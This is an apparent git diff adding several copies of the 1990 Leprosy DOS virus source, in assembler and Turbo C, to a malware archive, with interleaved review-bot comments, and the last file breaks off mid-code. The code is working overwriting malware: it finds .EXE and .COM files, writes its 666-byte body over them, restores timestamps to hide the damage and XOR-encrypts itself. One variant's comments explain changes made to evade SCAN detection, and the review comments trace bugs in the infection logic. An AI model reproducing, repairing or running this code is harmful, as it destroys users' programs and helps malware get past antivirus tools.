@@ -0,0 +1,297 @@ +; - Leprosy-B Virus Source +; Copy-ya-right (c) 1990 by PCM2. +; +; This file is the source code to the Leprosy-B virus. It should +; be assembled with an MASM-compatible assembler; it has been tested +; and assembles correctly with both MASM 4.0 and Turbo Assembler 1.0. +; It should be made into a .COM file before executing, with either +; the "/t" command line flag in TLINK or Microsoft's EXE2BIN utility. +; +; This program has the potential to permanently destroy executable +; images on any disk medium. Other modifications may have been made +; subsequent to the original release by the author, either benign, +; or which could result in further harm should this program be run. +; In any case, the author assumes no responsibility for any damage +; caused by this program, incidental or otherwise. As a precaution, +; this program should not be turned over to irresponsible hands... +; (unlike people like us, that is). +; +;;-=ð°±²Û²±°ð=-=ð°±²Û²±°ð=-=ð°±²Û²±°ð=-=ð°±²Û²±°ð=-=ð°±²Û²±°ð=-=ð°±²Û²±°ð=- +;; +;; - This virus is not really Leprosy-B. It is, in +;; fact, ALMOST the same. When I encountered the +;; source code and assembled it, I found, obviously +;; to my disappointment, that SCAN v77 could find +;; it. Since it is a self-encrypting virus, I knew +;; EXACTLY how to fix this problem (after all, +;; being part of McPhee's programs is a sure way to +;; know that your virus has been a big hit, but it +;; also means that it will soon meet a terrible end. +;; Presented with such a sad situation, I decided I +;; would modify the virus to give it one more shot +;; at the outside world. Not only that, but I will +;; make TWO new versions. This one, in particular, +;; will preserve the traditional length of 666, and +;; will only have a slight modification. You see, +;; since the virus encrypts itself, McPhee must go +;; on 1 or both of two paths. 
He must either use +;; the whole non-encrypted portion as an ID string, +;; or he must use the file offset where the value +;; for decrypting is normally stored, XOR it with +;; the rest of the program (this is how it encrypts +;; and decrypts itself), and then try to identify +;; the decrypted code as the virus. By changing +;; where the encryption value is stored in the non- +;; encrypted portion and putting a zero there in- +;; stead, (along with altering the primary instruc- +;; tions slightly), I have made it undetectable by +;; SCAN, despite the fact that it is (in all other +;; aspects) the same damn thing. +;; Have fun! +;; The BOOT SECTOR Infector... +;; +;; NOTE: Also, (in case you haven't already noticed) all of the changes +;; I make to this program will have a double semicolon (;;) on +;; them somewhere. This is to reinforce the fact that I DID +;; NOT do the original work on this virus. That credit is left +;; appropriately to PCM2. And I respect his brilliance in its +;; coding (especially the encrypt/decrypt portion!) +;; L8r peepz! +;; + + + + title "Leprosy-C Virus by PCM2, August 1990" +;; With additional modifications by TBSI, June 1991 + + +cr equ 13 ; Carriage return ASCII code +lf equ 10 ; Linefeed ASCII code +tab equ 9 ; Tab ASCII code +virus_size equ 666 ; Size of the virus file +code_start equ 100h ; Address right after PSP in memory +dta equ 80h ; Addr of default disk transfer area +datestamp equ 24 ; Offset in DTA of file's date stamp +timestamp equ 22 ; Offset in DTA of file's time stamp +filename equ 30 ; Offset in DTA of ASCIIZ filename +attribute equ 21 ; Offset in DTA of file attribute + + + code segment 'code' ; Open code segment + assume cs:code,ds:code ; One segment for both code & data + org code_start ; Start code image after PSP + +;--------------------------------------------------------------------- +; All executable code is contained in boundaries of procedure "main". 
+; The following code, until the start of "virus_code", is the non- +; encrypted CMT portion of the code to load up the real program. +;--------------------------------------------------------------------- +main proc near ; Code execution begins here + call encrypt_decrypt ; Decrypt the real virus code + jmp random_mutation ; Put the virus into action + db 0 ;; This line inserted by TBSI. If + ;; McPhee uses the second technique + ;; described in my speech, then it + ;; will find the zero and consider + ;; it to be the value it wants, even + ;; though using a zero will make it + ;; do absolutely NOTHING! +encrypt_val db 00h ; Hold value to encrypt by here + +; ---------- Encrypt, save, and restore the virus code ----------- +infect_file: + mov bx,handle ; Get the handle + push bx ; Save it on the stack + call encrypt_decrypt ; Encrypt most of the code + pop bx ; Get back the handle + nop ;; Added by TBSI to through of McPhee + mov cx,virus_size ; Total number of bytes to write + mov dx,code_start ; Buffer where code starts in memory + mov ah,40h ; DOS write-to-handle service + int 21h ; Write the virus code into the file + call encrypt_decrypt ; Restore the code as it was + ret ; Go back to where you came from + +; --------------- Encrypt or decrypt the virus code ---------------- +encrypt_decrypt: + mov bx,offset virus_code ; Get address to start encrypt/decrypt +xor_loop: ; Start cycle here + mov ah,[bx] ; Get the current byte + xor ah,encrypt_val ; Engage/disengage XOR scheme on it + mov [bx],ah ; Put it back where we got it + inc bx ; Move BX ahead a byte + nop ;; Added by TBSI to through of McPhee + cmp bx,offset virus_code+virus_size ; Are we at the end? + jle xor_loop ; If not, do another cycle + ret ; and go back where we came from + +;----------------------------------------------------------------------- +; The rest of the code from here on remains encrypted until run-time, +; using a fundamental XOR technique that changes via CMT. 
+;----------------------------------------------------------------------- +virus_code: + +;---------------------------------------------------------------------------- +; All strings are kept here in the file, and automatically encrypted. +; Please don't be a lamer and change the strings and say you wrote a virus. +; Because of Cybernetic Mutation Technology(tm), the CRC of this file often +; changes, even when the strings stay the same. +;---------------------------------------------------------------------------- +exe_filespec db "*.EXE",0 +com_filespec db "*.COM",0 +newdir db "..",0 +fake_msg db cr,lf,"Program too big to fit in memory$" +virus_msg1 db cr,lf,tab,"ATTENTION! Your computer has been afflicted with$" +virus_msg2 db cr,lf,tab,"the incurable decay that is the fate wrought by$" +virus_msg3 db cr,lf,tab,"Leprosy Strain B, a virus employing Cybernetic$" +virus_msg4 db cr,lf,tab,"Mutation Technology(tm) and invented by PCM2 08/90.$" +compare_buf db 20 dup (?) ; Buffer to compare files in +files_found db ? +files_infected db ? +orig_time dw ? +orig_date dw ? +orig_attr dw ? +handle dw ? +success db ? + +random_mutation: ; First decide if virus is to mutate + mov ah,2ch ; Set up DOS function to get time + int 21h + cmp encrypt_val,0 ; Is this a first-run virus copy? + je install_val ; If so, install whatever you get. + cmp dh,15 ; Is it less than 16 seconds? + jg find_extension ; If not, don't mutate this time +install_val: + cmp dl,0 ; Will we be encrypting using zero? + je random_mutation ; If so, get a new value. + mov encrypt_val,dl ; Otherwise, save the new value +find_extension: ; Locate file w/ valid extension + mov files_found,0 ; Count infected files found + mov files_infected,4 ; BX counts file infected so far + mov success,0 +find_exe: + mov cx,00100111b ; Look for all flat file attributes + mov dx,offset exe_filespec ; Check for .EXE extension first + mov ah,4eh ; Call DOS find first service + int 21h + cmp ax,12h ; Are no files found? 
+ je find_com ; If not, nothing more to do + call find_healthy ; Otherwise, try to find healthy .EXE +find_com: + mov cx,00100111b ; Look for all flat file attributes + mov dx,offset com_filespec ; Check for .COM extension now + mov ah,4eh ; Call DOS find first service + int 21h + cmp ax,12h ; Are no files found? + je chdir ; If not, step back a directory + call find_healthy ; Otherwise, try to find healthy .COM +chdir: ; Routine to step back one level + mov dx,offset newdir ; Load DX with address of pathname + mov ah,3bh ; Change directory DOS service + int 21h + dec files_infected ; This counts as infecting a file + jnz find_exe ; If we're still rolling, find another + jmp exit_virus ; Otherwise let's pack it up +find_healthy: + mov bx,dta ; Point BX to address of DTA + mov ax,[bx]+attribute ; Get the current file's attribute + mov orig_attr,ax ; Save it + mov ax,[bx]+timestamp ; Get the current file's time stamp + mov orig_time,ax ; Save it + mov ax,[bx]+datestamp ; Get the current file's data stamp + mov orig_date,ax ; Save it + mov dx,dta+filename ; Get the filename to change attribute + mov cx,0 ; Clear all attribute bytes + mov al,1 ; Set attribute sub-function + mov ah,43h ; Call DOS service to do it + int 21h + mov al,2 ; Set up to open handle for read/write + mov ah,3dh ; Open file handle DOS service + int 21h + mov handle,ax ; Save the file handle + mov bx,ax ; Transfer the handle to BX for read + mov cx,20 ; Read in the top 20 bytes of file + mov dx,offset compare_buf ; Use the small buffer up top + mov ah,3fh ; DOS read-from-handle service + int 21h + mov bx,offset compare_buf ; Adjust the encryption value + mov ah,encrypt_val ; for accurate comparison + mov [bx+6],ah + mov si,code_start ; One array to compare is this file + mov di,offset compare_buf ; The other array is the buffer + mov ax,ds ; Transfer the DS register... 
+ mov es,ax ; ...to the ES register + cld + repe cmpsb ; Compare the buffer to the virus + jne healthy ; If different, the file is healthy! + call close_file ; Close it up otherwise + inc files_found ; Chalk up another fucked up file +continue_search: + mov ah,4fh ; Find next DOS function + int 21h ; Try to find another same type file + cmp ax,12h ; Are there any more files? + je no_more_found ; If not, get outta here + jmp find_healthy ; If so, try the process on this one! +no_more_found: + ret ; Go back to where we came from +healthy: + mov bx,handle ; Get the file handle + mov ah,3eh ; Close it for now + int 21h + mov ah,3dh ; Open it again, to reset it + mov dx,dta+filename + mov al,2 + int 21h + mov handle,ax ; Save the handle again + call infect_file ; Infect the healthy file + call close_file ; Close down this operation + inc success ; Indicate we did something this time + dec files_infected ; Scratch off another file on agenda + jz exit_virus ; If we're through, terminate + jmp continue_search ; Otherwise, try another + ret +close_file: + mov bx,handle ; Get the file handle off the stack + mov cx,orig_time ; Get the date stamp + mov dx,orig_date ; Get the time stamp + mov al,1 ; Set file date/time sub-service + mov ah,57h ; Get/Set file date and time service + int 21h ; Call DOS + mov bx,handle + mov ah,3eh ; Close handle DOS service + int 21h + mov cx,orig_attr ; Get the file's original attribute + mov al,1 ; Instruct DOS to put it back there + mov dx,dta+filename ; Feed it the filename + mov ah,43h ; Call DOS + int 21h + ret +exit_virus: + cmp files_found,6 ; Are at least 6 files infected? + jl print_fake ; If not, keep a low profile + cmp success,0 ; Did we infect anything? 
+ jg print_fake ; If so, cover it up + mov ah,09h ; Use DOS print string service + mov dx,offset virus_msg1 ; Load the address of the first line + int 21h ; Print it + mov dx,offset virus_msg2 ; Load the second line + int 21h ; (etc) + mov dx,offset virus_msg3 + int 21h + mov dx,offset virus_msg4 + int 21h + jmp terminate +print_fake: + mov ah,09h ; Use DOS to print fake error message + mov dx,offset fake_msg + int 21h +terminate: + mov ah,4ch ; DOS terminate process function + int 21h ; Call DOS to get out of this program + +filler db 8 dup (90h) ; Pad out the file length to 666 bytes + +main endp +code ends + end main + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.leprosy-c.asm b/MSDOS/Virus.MSDOS.Unknown.leprosy-c.asm new file mode 100644 index 00000000..5f59a833 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.leprosy-c.asm 
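Review bot: The self-recognition check in `find_healthy` no longer lines up with the header laid out in `main`: with a 3-byte `call` and a 3-byte `jmp`, the TBSI `db 0` sits at offset 6 and `encrypt_val` at offset 7, yet the compare still patches `[bx+6]` with `encrypt_val` before `repe cmpsb`. The in-memory byte 6 is always zero and `install_val` rejects a zero key, so every already-infected file compares as healthy, `files_found` never advances and the `virus_msg` path in `exit_virus` is unreachable — the change meant to dodge SCAN also broke the virus's own marker test. A comment at that `mov [bx+6],ah` line would save the next reader the trace: `; NOTE: offset 6 is the inserted db 0 -- encrypt_val now lives at offset 7, so this patch never matches`. The `encrypt_decrypt` loop is also loose: `cmp bx,offset virus_code+virus_size` with `jle` runs, by my count, `virus_code-code_start+1` bytes past the 666-byte image instead of stopping at `code_start+virus_size`, harmless only because it is applied symmetrically before and after the write.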
@@ -0,0 +1,217 @@ +/* This file is part of the source code to the LEPROSY Virus 1.00 + Copy-ya-right (c) 1990 by PCM2. This program can cause destruction + of files; you're warned, the author assumes no responsibility + for damage this program causes, incidental or otherwise. This + program is not intended for general distribution -- irresponsible + users should not be allowed access to this program, or its + accompanying files. (Unlike people like us, of course...) +*/ + + +#pragma inline + +#define CRLF "\x17\x14" /* CR/LF combo encrypted. */ +#define NO_MATCH 0x12 /* No match in wildcard search. */ + + +/* The following strings are not garbled; they are all encrypted */ +/* using the simple technique of adding the integer value 10 to */ +/* each character. They are automatically decrypted by */ +/* 'print_s()', the function which sends the strings to 'stdout' */ +/* using DOS service 09H. All are terminated with a dollar-sign */ +/* "$" as per DOS service specifications. */ + +char fake_msg[] = CRLF "Z|yq|kw*~yy*lsq*~y*ps~*sx*wowy|\x83."; +char *virus_msg[3] = + { + CRLF "\x13XOa]*PVK]R++**cy\x7f|*}\x83}~ow*rk}*loox*sxpom~on*\x81s~r*~ro.", + CRLF "\x13sxm\x7f|klvo*nomk\x83*yp*VOZ\\Y]c*;8::6*k*\x80s|\x7f}*sx\x80ox~on*l\x83.", + CRLF "\x13ZMW<*sx*T\x7fxo*yp*;CC:8**Qyyn*v\x7fmu+\x17\x14." + }; + + + +struct _dta /* Disk Transfer Area format for find. */ + { + char findnext[21]; + char attribute; + int timestamp; + int datestamp; + long filesize; + char filename[13]; + } *dta = (struct _dta *) 0x80; /* Set it to default DTA. */ + + +const char filler[] = "XX"; /* Pad file length to 666 bytes. */ +const char *codestart = (char *) 0x100; /* Memory where virus code begins. */ +const int virus_size = 666; /* The size in bytes of the virus code. */ +const int infection_rate = 4; /* How many files to infect per run. */ + +char compare_buf[20]; /* Load program here to test infection. */ +int handle; /* The current file handle being used. 
*/ +int datestamp, timestamp; /* Store original date and time here. */ +char diseased_count = 0; /* How many infected files found so far. */ +char success = 0; /* How many infected this run. */ + + +/* The following are function prototypes, in keeping with ANSI */ +/* Standard C, for the support functions of this program. */ + +int find_first( char *fn ); +int find_healthy( void ); +int find_next( void ); +int healthy( void ); +void infect( void ); +void close_handle( void ); +void open_handle( char *fn ); +void print_s( char *s ); +void restore_timestamp( void ); + + + +/*----------------------------------*/ +/* M A I N P R O G R A M */ +/*----------------------------------*/ + +int main( void ) { + int x = 0; + do { + if ( find_healthy() ) { /* Is there an un-infected file? */ + infect(); /* Well, then infect it! */ + x++; /* Add one to the counter. */ + success++; /* Carve a notch in our belt. */ + } + else { /* If there ain't a file here... */ + _DX = (int) ".."; /* See if we can step back to */ + _AH = 0x3b; /* the parent directory, and try */ + asm int 21H; /* there. */ + x++; /* Increment the counter anyway, to */ + } /* avoid infinite loops. */ + } while( x < infection_rate ); /* Do this until we've had enough. */ + if ( success ) /* If we got something this time, */ + print_s( fake_msg ); /* feed 'em the phony error line. */ + else + if ( diseased_count > 6 ) /* If we found 6+ infected files */ + for( x = 0; x < 3; x++ ) /* along the way, laugh!! */ + print_s( virus_msg[x] ); + else + print_s( fake_msg ); /* Otherwise, keep a low profile. */ + return; +} + + +void infect( void ) { + _DX = (int) dta->filename; /* DX register points to filename. */ + _CX = 0x00; /* No attribute flags are set. */ + _AL = 0x01; /* Use Set Attribute sub-function. */ + _AH = 0x43; /* Assure access to write file. */ + asm int 21H; /* Call DOS interrupt. */ + open_handle( dta->filename ); /* Re-open the healthy file. */ + _BX = handle; /* BX register holds handle. 
*/ + _CX = virus_size; /* Number of bytes to write. */ + _DX = (int) codestart; /* Write program code. */ + _AH = 0x40; /* Set up and call DOS. */ + asm int 21H; + restore_timestamp(); /* Keep original date & time. */ + close_handle(); /* Close file. */ + return; +} + + +int find_healthy( void ) { + if ( find_first("*.EXE") != NO_MATCH ) /* Find EXE? */ + if ( healthy() ) /* If it's healthy, OK! */ + return 1; + else + while ( find_next() != NO_MATCH ) /* Try a few more otherwise. */ + if ( healthy() ) + return 1; /* If you find one, great! */ + if ( find_first("*.COM") != NO_MATCH ) /* Find COM? */ + if ( healthy() ) /* If it's healthy, OK! */ + return 1; + else + while ( find_next() != NO_MATCH ) /* Try a few more otherwise. */ + if ( healthy() ) + return 1; /* If you find one, great! */ + return 0; /* Otherwise, say so. */ +} + + + +int healthy( void ) { + int i; + datestamp = dta->datestamp; /* Save time & date for later. */ + timestamp = dta->timestamp; + open_handle( dta->filename ); /* Open last file located. */ + _BX = handle; /* BX holds current file handle. */ + _CX = 20; /* We only want a few bytes. */ + _DX = (int) compare_buf; /* DX points to the scratch buffer. */ + _AH = 0x3f; /* Read in file for comparison. */ + asm int 21H; + restore_timestamp(); /* Keep original date & time. */ + close_handle(); /* Close the file. */ + for ( i = 0; i < 20; i++ ) /* Compare to virus code. */ + if ( compare_buf[i] != *(codestart+i) ) + return 1; /* If no match, return healthy. */ + diseased_count++; /* Chalk up one more fucked file. */ + return 0; /* Otherwise, return infected. */ +} + + +void restore_timestamp( void ) { + _AL = 0x01; /* Keep original date & time. */ + _BX = handle; /* Same file handle. */ + _CX = timestamp; /* Get time & date from DTA. */ + _DX = datestamp; + _AH = 0x57; /* Do DOS service. */ + asm int 21H; + return; +} + + +void print_s( char *s ) { + char *p = s; + while ( *p ) { /* Subtract 10 from every character. 
*/ + *p -= 10; + p++; + } + _DX = (int) s; /* Set DX to point to adjusted string. */ + _AH = 0x09; /* Set DOS function number. */ + asm int 21H; /* Call DOS interrupt. */ + return; +} + + +int find_first( char *fn ) { + _DX = (int) fn; /* Point DX to the file name. */ + _CX = 0xff; /* Search for all attributes. */ + _AH = 0x4e; /* 'Find first' DOS service. */ + asm int 21H; /* Go, DOS, go. */ + return _AX; /* Return possible error code. */ +} + + +int find_next( void ) { + _AH = 0x4f; /* 'Find next' function. */ + asm int 21H; /* Call DOS. */ + return _AX; /* Return any error code. */ +} + + +void open_handle( char *fn ) { + _DX = (int) fn; /* Point DX to the filename. */ + _AL = 0x02; /* Always open for both read & write. */ + _AH = 0x3d; /* "Open handle" service. */ + asm int 21H; /* Call DOS. */ + handle = _AX; /* Assume handle returned OK. */ + return; +} + + +void close_handle( void ) { + _BX = handle; /* Load BX register w/current file handle. */ + _AH = 0x3e; /* Set up and call DOS service. */ + asm int 21H; + return; +} + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.leprosy.c b/MSDOS/Virus.MSDOS.Unknown.leprosy.c new file mode 100644 index 00000000..cbe7abd6 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.leprosy.c 
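Review bot: This file is Turbo C source, not assembler — `#pragma inline` and the `asm int 21H;` statements in `main()`, `infect()` and the helper functions only build under Borland's inline-asm C — so the `.asm` extension misclassifies the sample, and as far as the hunk shows its text is the same as `Virus.MSDOS.Unknown.leprosy.c` added in this commit apart from the trailing newline. For a corpus that is searched by extension and language this wants a rename to `.c` or, at minimum, a one-line header above the existing copyright comment such as `/* Turbo C source (uses #pragma inline / asm int 21H), not assembler; duplicate of leprosy.c in this tree */`. Note for anyone deriving string signatures from this source: `print_s()` decrypts each message in place with `*p -= 10`, so the bytes in a compiled binary are the +10-shifted forms shown in `fake_msg`/`virus_msg`, not the readable text.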
@@ -0,0 +1,216 @@ +/* This file is part of the source code to the LEPROSY Virus 1.00 + Copy-ya-right (c) 1990 by PCM2. This program can cause destruction + of files; you're warned, the author assumes no responsibility + for damage this program causes, incidental or otherwise. This + program is not intended for general distribution -- irresponsible + users should not be allowed access to this program, or its + accompanying files. (Unlike people like us, of course...) +*/ + + +#pragma inline + +#define CRLF "\x17\x14" /* CR/LF combo encrypted. */ +#define NO_MATCH 0x12 /* No match in wildcard search. */ + + +/* The following strings are not garbled; they are all encrypted */ +/* using the simple technique of adding the integer value 10 to */ +/* each character. They are automatically decrypted by */ +/* 'print_s()', the function which sends the strings to 'stdout' */ +/* using DOS service 09H. All are terminated with a dollar-sign */ +/* "$" as per DOS service specifications. */ + +char fake_msg[] = CRLF "Z|yq|kw*~yy*lsq*~y*ps~*sx*wowy|\x83."; +char *virus_msg[3] = + { + CRLF "\x13XOa]*PVK]R++**cy\x7f|*}\x83}~ow*rk}*loox*sxpom~on*\x81s~r*~ro.", + CRLF "\x13sxm\x7f|klvo*nomk\x83*yp*VOZ\\Y]c*;8::6*k*\x80s|\x7f}*sx\x80ox~on*l\x83.", + CRLF "\x13ZMW<*sx*T\x7fxo*yp*;CC:8**Qyyn*v\x7fmu+\x17\x14." + }; + + + +struct _dta /* Disk Transfer Area format for find. */ + { + char findnext[21]; + char attribute; + int timestamp; + int datestamp; + long filesize; + char filename[13]; + } *dta = (struct _dta *) 0x80; /* Set it to default DTA. */ + + +const char filler[] = "XX"; /* Pad file length to 666 bytes. */ +const char *codestart = (char *) 0x100; /* Memory where virus code begins. */ +const int virus_size = 666; /* The size in bytes of the virus code. */ +const int infection_rate = 4; /* How many files to infect per run. */ + +char compare_buf[20]; /* Load program here to test infection. */ +int handle; /* The current file handle being used. 
*/ +int datestamp, timestamp; /* Store original date and time here. */ +char diseased_count = 0; /* How many infected files found so far. */ +char success = 0; /* How many infected this run. */ + + +/* The following are function prototypes, in keeping with ANSI */ +/* Standard C, for the support functions of this program. */ + +int find_first( char *fn ); +int find_healthy( void ); +int find_next( void ); +int healthy( void ); +void infect( void ); +void close_handle( void ); +void open_handle( char *fn ); +void print_s( char *s ); +void restore_timestamp( void ); + + + +/*----------------------------------*/ +/* M A I N P R O G R A M */ +/*----------------------------------*/ + +int main( void ) { + int x = 0; + do { + if ( find_healthy() ) { /* Is there an un-infected file? */ + infect(); /* Well, then infect it! */ + x++; /* Add one to the counter. */ + success++; /* Carve a notch in our belt. */ + } + else { /* If there ain't a file here... */ + _DX = (int) ".."; /* See if we can step back to */ + _AH = 0x3b; /* the parent directory, and try */ + asm int 21H; /* there. */ + x++; /* Increment the counter anyway, to */ + } /* avoid infinite loops. */ + } while( x < infection_rate ); /* Do this until we've had enough. */ + if ( success ) /* If we got something this time, */ + print_s( fake_msg ); /* feed 'em the phony error line. */ + else + if ( diseased_count > 6 ) /* If we found 6+ infected files */ + for( x = 0; x < 3; x++ ) /* along the way, laugh!! */ + print_s( virus_msg[x] ); + else + print_s( fake_msg ); /* Otherwise, keep a low profile. */ + return; +} + + +void infect( void ) { + _DX = (int) dta->filename; /* DX register points to filename. */ + _CX = 0x00; /* No attribute flags are set. */ + _AL = 0x01; /* Use Set Attribute sub-function. */ + _AH = 0x43; /* Assure access to write file. */ + asm int 21H; /* Call DOS interrupt. */ + open_handle( dta->filename ); /* Re-open the healthy file. */ + _BX = handle; /* BX register holds handle. 
*/ + _CX = virus_size; /* Number of bytes to write. */ + _DX = (int) codestart; /* Write program code. */ + _AH = 0x40; /* Set up and call DOS. */ + asm int 21H; + restore_timestamp(); /* Keep original date & time. */ + close_handle(); /* Close file. */ + return; +} + + +int find_healthy( void ) { + if ( find_first("*.EXE") != NO_MATCH ) /* Find EXE? */ + if ( healthy() ) /* If it's healthy, OK! */ + return 1; + else + while ( find_next() != NO_MATCH ) /* Try a few more otherwise. */ + if ( healthy() ) + return 1; /* If you find one, great! */ + if ( find_first("*.COM") != NO_MATCH ) /* Find COM? */ + if ( healthy() ) /* If it's healthy, OK! */ + return 1; + else + while ( find_next() != NO_MATCH ) /* Try a few more otherwise. */ + if ( healthy() ) + return 1; /* If you find one, great! */ + return 0; /* Otherwise, say so. */ +} + + + +int healthy( void ) { + int i; + datestamp = dta->datestamp; /* Save time & date for later. */ + timestamp = dta->timestamp; + open_handle( dta->filename ); /* Open last file located. */ + _BX = handle; /* BX holds current file handle. */ + _CX = 20; /* We only want a few bytes. */ + _DX = (int) compare_buf; /* DX points to the scratch buffer. */ + _AH = 0x3f; /* Read in file for comparison. */ + asm int 21H; + restore_timestamp(); /* Keep original date & time. */ + close_handle(); /* Close the file. */ + for ( i = 0; i < 20; i++ ) /* Compare to virus code. */ + if ( compare_buf[i] != *(codestart+i) ) + return 1; /* If no match, return healthy. */ + diseased_count++; /* Chalk up one more fucked file. */ + return 0; /* Otherwise, return infected. */ +} + + +void restore_timestamp( void ) { + _AL = 0x01; /* Keep original date & time. */ + _BX = handle; /* Same file handle. */ + _CX = timestamp; /* Get time & date from DTA. */ + _DX = datestamp; + _AH = 0x57; /* Do DOS service. */ + asm int 21H; + return; +} + + +void print_s( char *s ) { + char *p = s; + while ( *p ) { /* Subtract 10 from every character. 
*/ + *p -= 10; + p++; + } + _DX = (int) s; /* Set DX to point to adjusted string. */ + _AH = 0x09; /* Set DOS function number. */ + asm int 21H; /* Call DOS interrupt. */ + return; +} + + +int find_first( char *fn ) { + _DX = (int) fn; /* Point DX to the file name. */ + _CX = 0xff; /* Search for all attributes. */ + _AH = 0x4e; /* 'Find first' DOS service. */ + asm int 21H; /* Go, DOS, go. */ + return _AX; /* Return possible error code. */ +} + + +int find_next( void ) { + _AH = 0x4f; /* 'Find next' function. */ + asm int 21H; /* Call DOS. */ + return _AX; /* Return any error code. */ +} + + +void open_handle( char *fn ) { + _DX = (int) fn; /* Point DX to the filename. */ + _AL = 0x02; /* Always open for both read & write. */ + _AH = 0x3d; /* "Open handle" service. */ + asm int 21H; /* Call DOS. */ + handle = _AX; /* Assume handle returned OK. */ + return; +} + + +void close_handle( void ) { + _BX = handle; /* Load BX register w/current file handle. */ + _AH = 0x3e; /* Set up and call DOS service. */ + asm int 21H; + return; +} diff --git a/MSDOS/Virus.MSDOS.Unknown.leprosyb.asm b/MSDOS/Virus.MSDOS.Unknown.leprosyb.asm new file mode 100644 index 00000000..5da9ad39 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.leprosyb.asm 
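Review bot: `open_handle()` stores `_AX` as the file handle with the comment "Assume handle returned OK", but DOS function 3Dh reports failure by setting CF and leaving an error code in AX, so after a failed open the error code is used as a handle by `healthy()` and `infect()`, and the 666-byte write in `infect()` can land on one of DOS's predefined handles (error codes 2–4 would alias stderr/aux/prn); `find_first()`/`find_next()` have the same gap, since the `!= NO_MATCH` test only means anything when CF is set. A note on `open_handle` such as `/* NOTE: CF is never tested - on failure AX is a DOS error code, not a handle */` would keep an analyst from mis-modelling the infection path. Separately, the trigger in `main()` is `diseased_count > 6` while its comment says "6+ infected files" and the assembler variants in this commit use `cmp files_found,6` / `jl`, i.e. 6 or more, so the C and asm strains differ by one; the comment or the comparison should be made to agree. `int main(void)` also ends in a bare `return;`, which is a compile warning and an undefined exit status.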
@@ -0,0 +1,242 @@
+; - Leprosy-B Virus Source
+; Copy-ya-right (c) 1990 by PCM2.
+;
+; This file is the source code to the Leprosy-B virus. It should
+; be assembled with an MASM-compatible assembler; it has been tested
+; and assembles correctly with both MASM 4.0 and Turbo Assembler 1.0.
+; It should be made into a .COM file before executing, with either
+; the "/t" command line flag in TLINK or Microsoft's EXE2BIN utility.
+;
+; This program has the potential to permanently destroy executable
+; images on any disk medium. Other modifications may have been made
+; subsequent to the original release by the author, either benign,
+; or which could result in further harm should this program be run.
+; In any case, the author assumes no responsibility for any damage
+; caused by this program, incidental or otherwise. As a precaution,
+; this program should not be turned over to irresponsible hands...
+; (unlike people like us, that is).
+
+
+ title "Leprosy-B Virus by PCM2, August 1990"
+
+cr equ 13 ; Carriage return ASCII code
+lf equ 10 ; Linefeed ASCII code
+tab equ 9 ; Tab ASCII code
+virus_size equ 666 ; Size of the virus file
+code_start equ 100h ; Address right after PSP in memory
+dta equ 80h ; Addr of default disk transfer area
+datestamp equ 24 ; Offset in DTA of file's date stamp
+timestamp equ 22 ; Offset in DTA of file's time stamp
+filename equ 30 ; Offset in DTA of ASCIIZ filename
+attribute equ 21 ; Offset in DTA of file attribute
+
+
+ code segment 'code' ; Open code segment
+ assume cs:code,ds:code ; One segment for both code & data
+ org code_start ; Start code image after PSP
+
+;---------------------------------------------------------------------
+; All executable code is contained in boundaries of procedure "main".
+; The following code, until the start of "virus_code", is the non-
+; encrypted CMT portion of the code to load up the real program.
+;--------------------------------------------------------------------- +main proc near ; Code execution begins here + call encrypt_decrypt ; Decrypt the real virus code + jmp random_mutation ; Put the virus into action + +encrypt_val db 00h ; Hold value to encrypt by here + +; ---------- Encrypt, save, and restore the virus code ----------- +infect_file: + mov bx,handle ; Get the handle + push bx ; Save it on the stack + call encrypt_decrypt ; Encrypt most of the code + pop bx ; Get back the handle + mov cx,virus_size ; Total number of bytes to write + mov dx,code_start ; Buffer where code starts in memory + mov ah,40h ; DOS write-to-handle service + int 21h ; Write the virus code into the file + call encrypt_decrypt ; Restore the code as it was + ret ; Go back to where you came from + +; --------------- Encrypt or decrypt the virus code ---------------- +encrypt_decrypt: + mov bx,offset virus_code ; Get address to start encrypt/decrypt +xor_loop: ; Start cycle here + mov ah,[bx] ; Get the current byte + xor ah,encrypt_val ; Engage/disengage XOR scheme on it + mov [bx],ah ; Put it back where we got it + inc bx ; Move BX ahead a byte + cmp bx,offset virus_code+virus_size ; Are we at the end? + jle xor_loop ; If not, do another cycle + ret ; and go back where we came from + +;----------------------------------------------------------------------- +; The rest of the code from here on remains encrypted until run-time, +; using a fundamental XOR technique that changes via CMT. +;----------------------------------------------------------------------- +virus_code: + +;---------------------------------------------------------------------------- +; All strings are kept here in the file, and automatically encrypted. +; Please don't be a lamer and change the strings and say you wrote a virus. +; Because of Cybernetic Mutation Technology(tm), the CRC of this file often +; changes, even when the strings stay the same. 
+;---------------------------------------------------------------------------- +exe_filespec db "*.EXE",0 +com_filespec db "*.COM",0 +newdir db "..",0 +fake_msg db cr,lf,"Program too big to fit in memory$" +virus_msg1 db cr,lf,tab,"ATTENTION! Your computer has been afflicted with$" +virus_msg2 db cr,lf,tab,"the incurable decay that is the fate wrought by$" +virus_msg3 db cr,lf,tab,"Leprosy Strain B, a virus employing Cybernetic$" +virus_msg4 db cr,lf,tab,"Mutation Technology(tm) and invented by PCM2 08/90.$" +compare_buf db 20 dup (?) ; Buffer to compare files in +files_found db ? +files_infected db ? +orig_time dw ? +orig_date dw ? +orig_attr dw ? +handle dw ? +success db ? + +random_mutation: ; First decide if virus is to mutate + mov ah,2ch ; Set up DOS function to get time + int 21h + cmp encrypt_val,0 ; Is this a first-run virus copy? + je install_val ; If so, install whatever you get. + cmp dh,15 ; Is it less than 16 seconds? + jg find_extension ; If not, don't mutate this time +install_val: + cmp dl,0 ; Will we be encrypting using zero? + je random_mutation ; If so, get a new value. + mov encrypt_val,dl ; Otherwise, save the new value +find_extension: ; Locate file w/ valid extension + mov files_found,0 ; Count infected files found + mov files_infected,4 ; BX counts file infected so far + mov success,0 +find_exe: + mov cx,00100111b ; Look for all flat file attributes + mov dx,offset exe_filespec ; Check for .EXE extension first + mov ah,4eh ; Call DOS find first service + int 21h + cmp ax,12h ; Are no files found? + je find_com ; If not, nothing more to do + call find_healthy ; Otherwise, try to find healthy .EXE +find_com: + mov cx,00100111b ; Look for all flat file attributes + mov dx,offset com_filespec ; Check for .COM extension now + mov ah,4eh ; Call DOS find first service + int 21h + cmp ax,12h ; Are no files found? 
